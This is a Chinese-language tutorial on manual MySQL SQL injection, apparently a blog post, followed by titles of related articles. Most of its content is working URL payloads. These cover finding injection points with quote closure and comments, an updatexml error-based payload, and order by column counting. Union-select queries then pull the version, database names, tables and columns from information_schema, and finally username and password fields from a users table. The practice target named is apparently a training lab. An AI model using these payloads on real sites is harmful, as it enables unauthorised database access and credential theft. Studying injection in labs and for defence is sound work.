MySQL手动注入步骤
MySQL相关的语句
database() 查看当前数据库
user()查看当前用户
version() 查看数据库版本
information_schema 数据库
schemata 表它是储存数据库名称的表
tables 表是用于储存所有表名的
columns 表是储存字段名称的
group_concat() 拼接函数
sleep()睡眠
判断是否存在注入点
判断注入点是有很多的方法,常见的 and -1=-1 还有其它的类型比如,堆叠注入、盲注的布尔型注入,时间型注入,还有报错注入以及闭合的一些符合,’(单引号),” (双引号)括号、百分号等一些闭合符合,还有就是注释符号,-- 或者 # 我局几个例子:
注释:双杠后面需要空格 防止注入失败,双杠注释不起作用就用 #
最常见使用的注入点判断语句
?id=1' and -1=-1 -- bbq
报错注入点
?id=1' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #
我就举例两个,判断注入点方法是很多的,比如过waf等就需要一些转义等,手工注入就是一个个的去验证了
判断有多少个字段数
order by 它是一个排序语句,原理大致就是如果一个表里有三列数据,分别是 id ,user, pwd 这三个字段,那么 order by 1 它会按照 id 那一列字段排序,order by 2 就是按照 user 字段排序,依次类推当出现 order by 4 的时候由于表中没有第四列字段,就回报错那么我们就知道了这个表有三个字段数了,这一步就为了显示错位,也就是为了把我们SQL语句结果展示的地方
?id=1' order by 6 -- bbq
展示显错位
上一步判断字段数时知道了多少列也就是字段数量,那么就展示错位为了下一步注入语句结果的展示
语句中的 11,22,33……是根据判断的字段数来的而且 id
或其它参数是查询不到结果的才能展示错位
?id=-1' union select 11,22,33,44,55 -- bbq
注意:显错位不全或者多了,都会导致没有结果
查询当前数据库
用显示错位的命令,可以看到页面上看到你 11,22,33等数字,在页面显示的数字写入SQL语句来注入
version()查看数据库版本 ,database()查看当前数据库
?id=-1' union select version() ,database(),33,44,55 -- bbq
查询所有数据库:
如果表多页面展示不全,可以使用 LIMIT
一页页展示
?id=-1' union select table_schema,22 from information_schema.tables -- bbq
或者:
?id=-1' union select schema_name,22 from information_schema.schemata-- bbq
table_schema
字段是information_schema
数据库的tables
表中记录数据库的
字段
schema_name
字段是information_schema
数据库的schemata
表中记录数据库的
字段
查询出数据库中的所有表
如果表多页面展示不全,可以使用 LIMIT 一页页展示,也可以使用group_concat() 拼接函数将显示的字段名包起来展示
查询当前数据库的所有表:
?id=-1' union select table_name,22,33 from information_schema.tables where table_schema=database() -- bbq
table_name
字段是information_schema
数据库的tables
表中记录数据库表的
字段
大致格式样例:?id=-1’ union select table_name,22,33 from information_schema.tables where table_schema=‘数据库名称’ – bbq
查询指定的表中的列名
查询出表名下一步就是,查询字段也就是列名称
查询指定数据库表的所有字段:
?id=-1' union select column_name,22,33 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq
column_name
字段是information_schema
数据库的columns
表中记录所有表字段的
字段
table_schema
和 table_name
字段在information_schema
数据库的columns
表中记录的和tables
表中一样
大致模板:?id=-1’ union select column_name,22,33 from information_schema.columns where table_schema=‘数据库名’ and table_name=‘表名’ – bbq
查询数据
当经过以上步骤,已经知道了数据库名、表名、字段名,那么就可以查询我们需要的数据了
例如:表名是 users 需要的数据字段分别是 username,password
?id=-1' union select username,password,33 from users -- bbq
手工步骤就这样,根据项目情况自己要改变注入方法以及学习其它方法注入
MySQL手动注入步骤相关推荐
- spring自定义作用域 依赖注入之手动注入
自定义作用域 spring容器自带的有2种作用域,分别是singleton和prototype:还有3种分别是spring web容器 环境中才支持的request.session.applicati ...
- SQL注入-基于MySQL的注入提权(十七)
实验目的(我的2003是32位的懒得搞了,大家参照一下吧) 普及结合dll文件对Windows系统进行启动项提权.MOF和UDF提权的基本思路,以及提权的主要方法.PS:面试时不要说打靶场什么东西,就 ...
- 注入双括号报错注入_SQL手动注入:sqlilabs(less110)
种一棵树最好的时间是10年前,其次是现在. 忘了是谁 前言 说实话,由于前段时间学 python ,对于 OWASP TOP10 漏洞的学习都有所落下,虽然现在也在慢慢复习当中,但是今晚谈及的 SQL ...
- mysql偏移注入_移位溢注:告别靠人品的偏移注入
*本文原创作者:SeagullGR,本文属FreeBuf原创奖励计划,未经许可禁止转载 在Access数据库类型注入的时候,我们获取不到列名(前提是有表名),一般会选择使用偏移注入,但是这种注入方式往 ...
- 【Spring】Spring 依赖注入之手动注入
文章目录 1.概述 2.依赖回顾 2.依赖对象的初始化方式 2.1 通过构造器设置依赖对象 2.2 通过set方法设置依赖对象 3.spring依赖注入 3.1 通过构造器注入 3.1.1 根据构造器 ...
- MySQL详细安装步骤
MySQL详细安装步骤 一.下载MySQL 点击下载MySQL 二.安装 MySQL安装文件分两种.msi和.zip,此处选择zip安装. 解压缩之后其实MySQL就可以使用了,但是要进行环境变量的配 ...
- SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)
CONTENTS 1 项目实验环境 2 SQL注入概述 2.1 SQL注入简介 2.2 SQL注入的危害 3 SQL基础回顾 3.1 联合查询union 3.2 information_schema数 ...
- SQL注入第二章节MYSQL手工注入
SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...
- mysql时间 注入 sleep_mysql注入sleep语句引发的拒绝服务
mysql存在注入,并且注入的sleep语句如果传入一个足够大的参数,比如:sleep(9999999999). 如果数据库用的是myisam引擎,且注入点是某个会锁表的语句(insert,repla ...
最新文章
- 自定义 Layer 属性的动画
- linux下运行yolo,deepin(linux)编译安装yolo v4测试效果
- 在Rancher 1.6上部署Traefik负载均衡器
- PowerDesigner基本使用
- 构造java_Java构造方法
- Win10系统下安装ubuntu系统
- servlet容器_Tomcat是一个Servlet容器?
- 英语影响计算机专业,英语不好对于学习计算机编程来说到底有没有影响?
- java三角函数计算器_java 计算器代码能实现三角函数和阶乘功能
- 将两张图片合并成一个PDF,不收费
- 移动web前端开发注意事项
- PS修改图片上的文字
- 计算机如何共享手机网络热点,怎么在电脑上建立热点WIFI与手机共享网络
- HarmonyOS第三方组件——鸿蒙图片裁剪组件ohos-Image-Cropper
- python美化excel_Python 使用 prettytable 库打印表格(美化输出)
- Windows 7 SP1整合补丁
- 使用PS制作旋转星空
- 提示程序需要Windows 7 Service Pack 1或更高版本问题如何解决?
- 微信小程序设置底部tab选项卡
- 表的自然连接(数据结构链表链接)
热门文章
- cocos2d-x 3 0 制作横版格斗游戏
- 压死了,压死了。。。
- KALI LINUX2021环境下使用sqlmap进行DVWA中的sql注入(安全等级LOW)
- 百度-AI趣味课堂(三)
- 不同虚拟化技术 virtio 之间的区别
- 3632: 外太空旅行
- 动态规划和回溯法的异同
- VirtualBox中Kali使用USB无线网卡
- Tomcat异常退出:EXCEPTION_ACCESS_VIOLATION (0xc0000005)--Problematic frame: # C
- 淘宝erp解密接口】如何通过商品标题来引流,怎样测试自己的标题是否具有引流的作用